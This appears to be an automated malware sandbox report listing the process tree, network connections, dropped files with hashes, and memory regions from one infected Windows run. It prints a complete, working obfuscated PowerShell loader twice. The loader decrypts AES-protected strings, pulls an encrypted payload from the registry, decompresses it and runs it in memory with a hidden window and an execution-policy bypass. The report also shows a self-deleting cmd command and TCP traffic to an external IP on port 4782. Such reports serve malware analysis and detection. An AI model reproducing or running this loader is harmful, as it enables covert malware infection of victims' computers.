C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{62105ef6-29fa-467e-b9a5-81419faa8537}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e7bc4198-1eea-4999-9025-1b21a802bc4a}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3140).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{e0c64e4a-e289-446b-9b62-aad49c20761f}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{ab669555-1861-4cd5-bb82-f900b9024d77}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{8782712f-e10f-41c5-8d5c-e2d4b98f5c50}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f340cd86-ca5c-45a4-bf7d-667d6f3d75af}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a80c228b-076e-4481-bbab-32b4da8f515b}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{31e4bd32-ecb1-447b-ba19-fb7c88d83439}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ab2103d1-5466-41e7-b63d-5f2f340b56a3}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{519bd706-2191-4464-9c0e-f597a8cfe5c9}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1788 -ip 1788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 480

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2bc96821-fb4e-4a02-b1d2-b9a3808fcc98}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 640 -p 5172 -ip 5172

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5172 -s 416

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{109c5d41-12cb-47d9-94d2-123258ce61c2}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{b5dcbc06-7a0e-4b61-98f3-555610136be3}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{61efd6de-ac99-456f-9f47-e74f02889d8a}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 600 -p 3140 -ip 3140

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3140 -s 1096

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2fadd490-4a00-4232-a576-3ab452933281}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{780e673d-6db3-4954-ae44-c01d58bd29e4}

Network

Country Destination Domain Proto
FR 163.5.215.216:4782 tcp
FR 163.5.215.216:4782 tcp

Files

memory/1656-0-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp

memory/1656-1-0x000001F0D2ED0000-0x000001F0D308E000-memory.dmp

memory/1656-2-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/1656-3-0x000001F0EE780000-0x000001F0EE860000-memory.dmp

memory/1656-4-0x000001F0EEA40000-0x000001F0EEBE6000-memory.dmp

memory/1656-5-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/1656-6-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/3112-15-0x000001E9C6DF0000-0x000001E9C6E12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqhyqas2.ynr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3112-16-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/3112-17-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/3112-18-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/3112-19-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/1656-32-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp

memory/1656-33-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/1656-34-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/3112-35-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/4644-36-0x000001F180000000-0x000001F180024000-memory.dmp

memory/3112-37-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/4644-39-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

memory/4644-38-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

memory/3112-40-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp

memory/4644-41-0x000001F180330000-0x000001F180D80000-memory.dmp

memory/4644-43-0x000001F180D90000-0x000001F180E36000-memory.dmp

memory/4644-45-0x000001F180EA0000-0x000001F180EF8000-memory.dmp

memory/4644-44-0x000001F180E40000-0x000001F180E96000-memory.dmp

memory/4644-46-0x000001F180F00000-0x000001F180F22000-memory.dmp

memory/4644-49-0x000001F180FE0000-0x000001F180FEA000-memory.dmp

memory/4644-47-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

memory/1980-51-0x0000000140000000-0x0000000140004000-memory.dmp

memory/1980-50-0x0000000140000000-0x0000000140004000-memory.dmp

memory/2700-52-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2700-53-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

memory/3140-75-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

memory/3140-76-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

memory/3140-77-0x000001B278DE0000-0x000001B279364000-memory.dmp

memory/3140-78-0x000001B279760000-0x000001B279F2A000-memory.dmp

memory/3140-79-0x000001B279F30000-0x000001B27A36E000-memory.dmp

memory/3140-80-0x000001B27A370000-0x000001B27A422000-memory.dmp

memory/3140-81-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

memory/3140-89-0x000001B27BAA0000-0x000001B27BAF0000-memory.dmp

memory/3140-90-0x000001B27BBB0000-0x000001B27BC62000-memory.dmp

memory/3140-91-0x000001B27BE40000-0x000001B27C002000-memory.dmp

memory/3140-100-0x000001B27BAF0000-0x000001B27BB2C000-memory.dmp

memory/3140-101-0x000001B27BA50000-0x000001B27BA9E000-memory.dmp

memory/3140-103-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

memory/3140-104-0x000001B27BB30000-0x000001B27BB66000-memory.dmp

memory/3140-102-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

memory/4716-105-0x0000000140000000-0x0000000140028000-memory.dmp

memory/4716-106-0x0000000140000000-0x0000000140028000-memory.dmp

memory/4716-108-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp

memory/4716-107-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp

memory/2600-109-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2600-110-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2600-112-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2600-114-0x0000000001730000-0x000000000174A000-memory.dmp

memory/640-119-0x0000028CDD830000-0x0000028CDD857000-memory.dmp

memory/468-123-0x000001D500590000-0x000001D5005B7000-memory.dmp

memory/692-128-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/996-131-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/420-138-0x000002B9B30C0000-0x000002B9B30E7000-memory.dmp

